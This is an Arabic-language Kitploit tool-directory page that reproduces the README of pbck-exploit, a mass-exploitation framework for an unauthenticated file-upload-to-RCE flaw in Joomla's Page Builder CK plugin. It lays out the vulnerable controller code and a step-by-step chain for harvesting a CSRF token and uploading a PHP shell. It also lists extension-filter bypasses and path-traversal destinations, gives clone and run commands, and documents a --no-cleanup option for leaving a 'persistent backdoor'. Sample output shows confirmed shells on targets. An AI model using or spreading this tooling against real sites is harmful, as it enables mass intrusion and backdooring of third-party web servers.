Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pbck-exploit — 📤 إطار عمل استغلال جماعي لثغرة CVE-2026-56290 — رفع ملفات بدون مصادقة في Page Builder CK لـ Joomla يؤدي إلى تنفيذ كود عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/shinthink/pbck-exploit
الاستطلاعماسحات الثغرات الأمنيةأطر الاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubshinthink/pbck-exploit

pbck-exploit

📤 إطار عمل استغلال جماعي لثغرة CVE-2026-56290 — رفع ملفات بدون مصادقة في Page Builder CK لـ Joomla يؤدي إلى تنفيذ كود عن بُعد (RCE)

عرض المستودع
316منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PBCK-Exploit — استغلال CVE-2026-56290 لإضافة Joomla Page Builder CK

Python CVE License

Discovery CSRF RCE Cleanup Live

إطار عمل للاستغلال الجماعي & التحقق من إضافة Joomla Page Builder CK

رفع ملفات عشوائي بدون مصادقة → تنفيذ أكواد عن بُعد



📑 جدول المحتويات

  • نظرة عامة على الثغرة
  • الإصدارات المتأثرة
  • الميزات
  • التثبيت
  • الاستخدام
  • إثبات المفهوم
  • الغوص التقني
  • منهجية الكشف
  • الدفاع & التخفيف
  • إخلاء المسؤولية
  • المراجع

🔴 نظرة عامة على الثغرة

CVE-2026-56290 هي ثغرة ذات خطورة حرجة في Page Builder CK (com_pagebuilderck)، وهي إضافة شائعة لبناء الصفحات في Joomla. تقبل طريقة browse.ajaxAddPicture في وحدة التحكم رفع ملفات بدون مصادقة مع مسار وجهة يتحكم فيه المستخدم، مما يسمح للمهاجمين بكتابة ملفات PHP عشوائية في أدلة يمكن الوصول إليها عبر الويب.

السبب الجذري

// browse.php controller — NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

تخضع معلمة path لتنظيف trim() فقط — لا قائمة بيضاء، ولا فحص لاجتياز المسار، ولا بوابة مصادقة. وبالاقتران مع رمز CSRF متاح للجمهور من أي صفحة Joomla، يمكن للمهاجمين رفع قذائف PHP عن بُعد إلى أي دليل قابل للكتابة.

الأثر

المتجهالخطورةالأثر
رفع ملفات بدون مصادقة9.8 (حرجة)تنفيذ كود PHP عشوائي
جمع رموز CSRF5.3 (متوسطة)تمكين سلسلة الرفع
كشف المعلومات5.3 (متوسطة)تحديد بصمة إصدار الإضافة

سلسلة الهجوم

1. HIT Joomla homepage     →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs

🟠 الإصدارات المتأثرة

إصدار Page Builder CKالحالةملاحظات
3.1.1 وما دون🔴 قابل للاختراقرفع بدون مصادقة مؤكد
3.4.10 وما دون🔴 قابل للاختراقنطاق موسّع وفقًا للتحليل
3.5.10 وما دون🔴 قابل للاختراققد توجد نسخ مصحّحة
> 3.5.10🟢 ربما مصحّحتحقق عبر ملف manifest XML

ملاحظة: يتم اكتشاف الإصدار من ملف manifest الخاص بـ Joomla على المسار /administrator/manifests/files/com_pagebuilderck.xml. إذا تعذّر الوصول إلى ملف manifest، يتعامل الماسح الضوئي مع الهدف افتراضيًا باعتباره قابلًا للاختراق.


✨ الميزات

🔍 الاستطلاع

  • كشف Joomla — مرحلتان: بصمات HTML + فحص لوحة الإدارة
  • كشف PBCK — فحوصات مسار مباشرة + مطابقة أنماط HTML
  • استخراج الإصدار — تحليل manifest XML + بديل regex على HTML
  • جمع رموز CSRF — استخراج الرموز من عدة صفحات (الرئيسية، تسجيل الدخول، التسجيل، الإدارة)
  • التخمين القسري لنقاط النهاية — أكثر من 1000 تركيبة من task/param/path مع اكتشاف بميزانية زمنية

💀 الاستغلال

  • تجاوز أكثر من 40 امتدادًا — تلاعب بحالة الأحرف، متغيرات مرقّمة، امتدادات مزدوجة، حيل Windows
  • أكثر من 20 مسار وجهة — أدلة الإضافات، أدلة Joomla القابلة للكتابة، مسارات اجتياز
  • التحقق من القشرة — تأكيد قائم على الرمز بأن PHP يُنفَّذ
  • تنظيف تلقائي — القذائف تدمر نفسها بعد التحقق (?cleanup=1)
  • خرج TXT مباشر — نتائج لحظية آمنة للخيوط تُكتب إلى ملف
  • تقرير JSON — تقرير منظم بتفاصيل كاملة لكل هدف

📦 التثبيت

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

المتطلبات

requests>=2.28.0
urllib3>=1.26.0

📖 الاستخدام

وسائط سطر الأوامر

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

الاستخدام الأساسي

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

تنسيق ملف الأهداف

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

🧪 إثبات المفهوم

السيناريو 1: فحص جماعي مع خرج مباشر

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
────────────────────────────────────────────────────────────

  ✅ https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  🛡️ https://target-patched.com  [patched]  3.2s

  ✅ https://target-vuln2.com  [rce_confirmed]  15.1s
     PBCK: 3.1.0 [VULN]
     RCE  : ext=pHP | path=media/com_pagebuilderck/fonts/
     Shell: https://target-vuln2.com/media/com_pagebuilderck/fonts/pbck_x7k2m4v9.pHP
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path
تنزيل الأداة